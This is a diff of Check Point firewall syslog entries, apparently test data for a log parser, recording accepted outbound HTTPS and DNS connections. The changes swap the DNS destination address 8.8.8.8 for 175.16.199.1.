 <134>1 2020-03-29T18:12:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e505,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58786"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59191"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41679"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55369"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47868"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45848"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45258"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59191"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41679"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55369"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47868"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45848"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45258"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44938"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36918"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36918"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53298"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43105"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43105"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38706"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42942"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40312"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45694"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58751"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55055"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42942"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40312"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45694"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58751"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55055"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
